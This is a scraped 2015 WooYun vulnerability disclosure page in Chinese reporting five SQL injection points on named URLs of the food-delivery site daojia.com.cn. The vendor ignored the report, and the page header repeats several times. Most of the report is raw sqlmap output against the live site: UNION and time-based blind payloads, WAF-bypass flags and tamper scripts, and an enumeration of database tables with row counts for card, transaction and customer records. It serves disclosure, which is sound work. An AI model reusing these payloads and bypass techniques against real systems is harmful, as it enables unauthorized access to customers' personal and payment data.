到家美食会多处存在SQL注入（涉及商家帐号信息/接近百万的客户记录/几十万卡号/信息记录等等）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0161042

漏洞标题：到家美食会多处存在SQL注入（涉及商家帐号信息/接近百万的客户记录/几十万卡号/信息记录等等）

漏洞作者：路人甲

提交时间：2015-12-13 20:48

修复时间：2015-12-18 20:50

公开时间：2015-12-18 20:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-13：细节已通知厂商并且等待厂商处理中
2015-12-18：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

如果只是一处修复不当或者一处存在SQL注入就不提交了，发现还是有好几处的！~~~其中几个是大牛提交过没有修复的，还有几个是新找到的，没有被提交过的！~~~这样还不能走首页？？？
厂商给的rank挺低的，被大牛提交过的注入点，修复不当，重要的union的也没有修复，导致继续SQL注入；还可以通过增加level和risk，tamper来进行绕过！~~~希望重视一下吧！~~
PS：求来一个20rank可否，测试一天也累了！~~~

详细说明：

注入点一：

http://b.daojia.com.cn/service.php?action=2147483649&user=admin&uid=1449954143596

user仍旧存在注入，union的！~~~

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: user
    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: action=2147483649&user=admin') UNION ALL SELECT NULL,NULL,CONCAT(0x
716f6e7671,0x504c416e6c645a785a43,0x7163666271),NULL#&uid=1449954143596
---
[11:16:41] [INFO] testing MySQL
[11:16:42] [INFO] confirming MySQL
[11:16:42] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0
[11:16:42] [INFO] fetching current user
current user:    '[email protected].%'
[11:16:42] [INFO] fetching current database
current database:    'daojia'
[11:16:42] [INFO] testing if current user is DBA
[11:16:42] [INFO] fetching current user
[11:16:42] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
current user is DBA:    False
[11:20:53] [INFO] fetching database users
[11:20:53] [INFO] the SQL query used returns 1 entries
[11:20:53] [INFO] resumed: "'daojia'@'10.1.1.%'"
database management system users [1]:
[*] 'daojia'@'10.1.1.%'
[11:20:53] [INFO] fetching database names
[11:20:53] [INFO] the SQL query used returns 3 entries
[11:20:53] [INFO] starting 3 threads
[11:20:53] [INFO] resumed: "test"
[11:20:53] [INFO] resumed: "daojia"
[11:20:53] [INFO] resumed: "information_schema"
available databases [3]:
[*] daojia
[*] information_schema
[*] test
Database: test
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| blog_user                             | 1       |
+---------------------------------------+---------+
Database: daojia
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| bakTbl_Reconciliation20151022         | 982908  |
| Tbl_Reconciliation                    | 743209  |
| Tbl_UsedCard                          | 602351  |
| Tbl_CustomValueAccountTransaction     | 456038  |
| Tbl_SM                                | 442691  |
| Tbl_CardPayingRecord                  | 364366  |
| Tbl_Card                              | 311683  |
| Tbl_DepositTransaction                | 116940  |
| Tbl_CustomValueAccount                | 57413   |
| Tbl_Invite                            | 26148   |
| Tbl_RestaurantDelayedLog              | 5244    |
| Tbl_ToAuditCooperation                | 2984    |
| Tbl_ServiceMan                        | 1780    |
| Tbl_GiftCardSubNumber                 | 1755    |
| Tbl_CardNoRange                       | 1206    |
| Tbl_Session                           | 1120    |
| Tbl_ServiceManAuditStat               | 487     |
| Tbl_CardPatch                         | 461     |
| Tbl_DaoJiaAccountStat                 | 334     |
| Tbl_ToAuditCard                       | 177     |
| Tbl_FilesUploadLog                    | 168     |
| Tbl_Area                              | 145     |
| Tbl_Third_Delivery_Config             | 137     |
| Tbl_GiftCard                          | 108     |
| Tbl_InviteStat                        | 86      |
| Tbl_Config                            | 76      |
| Tbl_Province                          | 34      |
| Tbl_City                              | 11      |
| Tbl_CardCatagory                      | 9       |
| Tbl_UpgradeLog                        | 8       |
+---------------------------------------+---------+

增加--level 3 --risk 2测试结果

GET parameter 'user' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N] n
sqlmap identified the following injection points with a total of 469 HTTP(s) req
uests:
---
Place: GET
Parameter: user
    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: action=2147483649&user=admin') UNION ALL SELECT NULL,NULL,CONCAT(0x
7165676f71,0x5563637a5a6d794d5245,0x7178667071),NULL#&uid=1449954143596
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: action=2147483649&user=admin') AND 1060=BENCHMARK(5000000,MD5(0x574
e446f)) AND ('ByJf'='ByJf&uid=1449954143596
---
[12:26:43] [INFO] testing MySQL
[12:26:43] [INFO] confirming MySQL
[12:26:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0
[12:26:43] [INFO] fetching current user
current user:    '[email protected].%'
[12:26:43] [INFO] fetching current database
current database:    'daojia'
[12:26:43] [INFO] testing if current user is DBA
[12:26:43] [INFO] fetching current user
[12:26:44] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
current user is DBA:    False

注入点二：

http://beijing.daojia.com.cn/combo_list.php?a=2

a存在时间盲注，当然用常规的注入不到，添加参数--level 5 --risk 2 --technique TB --time-sec 5就可以绕过进行注入了！~~~

[17:00:37] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
you provided a HTTP Cookie header value. The target URL provided its own cookies
 within the HTTP Set-Cookie header which intersect with yours. Do you want to me
rge them in futher requests? [Y/n]
[17:00:39] [INFO] target URL is stable
sqlmap got a 302 redirect to 'http://beijing.daojia.com.cn:80/index.html'. Do yo
u want to follow? [Y/n]
[17:00:41] [WARNING] heuristic (basic) test shows that GET parameter 'a' might n
ot be injectable
[17:00:41] [INFO] testing for SQL injection on GET parameter 'a'
[17:00:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:01:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MyS
QL comment)'
[17:02:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Gen
eric comment)'
[17:03:52] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY o
r GROUP BY clause (RLIKE)'
[17:04:57] [INFO] testing 'Generic boolean-based blind - Parameter replace (orig
inal value)'
[17:04:58] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_S
ET - original value)'
[17:05:00] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT -
original value)'
[17:05:01] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*i
nt - original value)'
[17:05:03] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace
(original value)'
[17:05:04] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (
original value)'
[17:05:06] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY c
lauses'
[17:05:09] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY c
lauses (original value)'
[17:05:12] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER
 BY clauses'
[17:05:15] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER
BY clauses'
[17:05:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[17:05:32] [INFO] GET parameter 'a' seems to be 'MySQL > 5.0.11 AND time-based b
lind' injectable
[17:05:32] [INFO] checking if the injection point on GET parameter 'a' is a fals
e positive
GET parameter 'a' is vulnerable. Do you want to keep testing the others (if any)
? [y/N] n
sqlmap identified the following injection points with a total of 386 HTTP(s) req
uests:
---
Place: GET
Parameter: a
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: a=2 AND SLEEP(5)
---
[17:06:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: PHP 5.4.41, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[17:06:20] [INFO] fetching current user
[17:06:20] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[17:06:20] [INFO] retrieved:
[17:06:20] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
[email protected].%
current user:    '[email protected].%'
[17:11:55] [INFO] fetching current database
[17:11:56] [INFO] retrieved: daojia
current database:    'daojia'
[17:14:10] [INFO] testing if current user is DBA
[17:14:10] [INFO] fetching current user
current user is DBA:    False

注入点三：

http://beijing.daojia.com.cn/service.php?action=1879048193&card=111111

card存在注入，添加参数--tamper space2comment.py绕过

[17:39:54] [INFO] loading tamper script 'space2comment'
[17:39:55] [INFO] testing connection to the target URL
[17:39:56] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
[17:39:57] [INFO] target URL is stable
[17:39:57] [WARNING] heuristic (basic) test shows that GET parameter 'card' migh
t not be injectable
[17:39:57] [INFO] testing for SQL injection on GET parameter 'card'
[17:39:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:39:58] [INFO] GET parameter 'card' seems to be 'AND boolean-based blind - WH
ERE or HAVING clause' injectable
[17:39:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[17:39:59] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[17:39:59] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[17:40:11] [INFO] GET parameter 'card' seems to be 'MySQL > 5.0.11 AND time-base
d blind' injectable
[17:40:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[17:40:11] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[17:40:11] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[17:40:12] [INFO] target URL appears to have 5 columns in query
[17:40:14] [INFO] GET parameter 'card' is 'MySQL UNION query (NULL) - 1 to 20 co
lumns' injectable
GET parameter 'card' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N] n
sqlmap identified the following injection points with a total of 30 HTTP(s) requ
ests:
---
Place: GET
Parameter: card
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=1879048193&card=111111 AND 4490=4490
    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: action=1879048193&card=-9445 UNION ALL SELECT NULL,NULL,NULL,NULL,C
ONCAT(0x71736a6871,0x447963734f69744a5270,0x71646f6a71)#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: action=1879048193&card=111111 AND SLEEP(5)
---
[17:40:17] [WARNING] changes made by tampering scripts are not included in shown
 payload content(s)
[17:40:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: PHP 5.4.41, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[17:40:17] [INFO] fetching current user
current user:    '[email protected].%'
[17:40:17] [INFO] fetching current database
current database:    'beijing'
[17:40:18] [INFO] testing if current user is DBA
[17:40:18] [INFO] fetching current user
current user is DBA:    False

注入点四：

http://beijing.daojia.com.cn/review.php?a=67&r=2337

在这个界面，a依旧可以通过sqlmap中添加参数--level 5 --risk 2 --technique TB --time-sec 5就可以绕过进行注入了！~~~

sqlmap identified the following injection points with a total of 930 HTTP(s) req
uests:
---
Place: GET
Parameter: a
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: a=67 AND SLEEP(5)&r=2337
---
[18:25:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: PHP 5.4.41, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[18:25:09] [INFO] fetching current user
[18:25:09] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[18:25:09] [INFO] retrieved:
[18:25:09] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
d
[18:26:12] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[18:26:12] [WARNING] if the problem persists please try to lower the number of u
sed threads (option '--threads')
[18:26:19] [ERROR] invalid character detected. retrying..
[18:26:19] [WARNING] increasing time delay to 6 seconds
[email protected].%
current user:    '[email protected].%'
[18:32:24] [INFO] fetching current database
[18:32:24] [INFO] retrieved: daojia
[18:35:07] [ERROR] invalid character detected. retrying..
[18:35:07] [WARNING] increasing time delay to 7 seconds
current database:    'daojia'
[18:35:12] [INFO] testing if current user is DBA
[18:35:12] [INFO] fetching current user
current user is DBA:    False

注入点五：

http://beijing.daojia.com.cn/service.php?action=CANTURLFOODNUM&foodID=415041

foodID存在注入，添加参数--threads 10 --dbms "MySQL" --current-user --current-db --is-dba -p foodID --technique T --time-sec 1 --tameper between.py
绕过

[19:23:49] [INFO] loading tamper script 'between'
[19:23:49] [INFO] testing connection to the target URL
[19:24:00] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
[19:24:01] [INFO] target URL is stable
[19:24:01] [WARNING] heuristic (basic) test shows that GET parameter 'foodID' mi
ght not be injectable
[19:24:01] [INFO] testing for SQL injection on GET parameter 'foodID'
[19:24:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:24:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[19:24:05] [INFO] testing 'MySQL inline queries'
[19:24:05] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[19:24:05] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[19:24:16] [INFO] GET parameter 'foodID' seems to be 'MySQL > 5.0.11 AND time-ba
sed blind' injectable
[19:24:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[19:24:16] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[19:24:19] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:24:22] [INFO] checking if the injection point on GET parameter 'foodID' is a
 false positive
GET parameter 'foodID' is vulnerable. Do you want to keep testing the others (if
 any)? [y/N] n
sqlmap identified the following injection points with a total of 85 HTTP(s) requ
ests:
---
Place: GET
Parameter: foodID
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: action=CANTURLFOODNUM&foodID=415041 AND SLEEP(5)-- ZtMW
---
[19:24:43] [WARNING] changes made by tampering scripts are not included in shown
 payload content(s)
[19:24:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: PHP 5.4.41, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[19:24:43] [INFO] fetching current user
[19:24:43] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[19:24:43] [INFO] retrieved:
[19:24:43] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n]
[19:25:00] [INFO] adjusting time delay to 1 second due to good response times
[email protected].%
current user:    '[email protected].%'
[19:26:05] [INFO] fetching current database
[19:26:05] [INFO] retrieved: daojia
current database:    'daojia'
[19:26:32] [INFO] testing if current user is DBA
[19:26:32] [INFO] fetching current user
current user is DBA:    False

漏洞证明：

如上

修复方案：

Rank真的很低，虽然现在用户量不大，趁早修复吧！~~~测试一天了，累了。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-12-18 20:50

厂商回复：

漏洞Rank：15 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0161042

漏洞标题：到家美食会多处存在SQL注入（涉及商家帐号信息/接近百万的客户记录/几十万卡号/信息记录等等）

相关厂商：daojia.com.cn

漏洞作者：路人甲

提交时间：2015-12-13 20:48

修复时间：2015-12-18 20:50

公开时间：2015-12-18 20:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0161042

漏洞标题：到家美食会多处存在SQL注入（涉及商家帐号信息/接近百万的客户记录/几十万卡号/信息记录等等）

相关厂商：daojia.com.cn

漏洞作者： 路人甲

提交时间：2015-12-13 20:48

修复时间：2015-12-18 20:50

公开时间：2015-12-18 20:50

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0161042"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云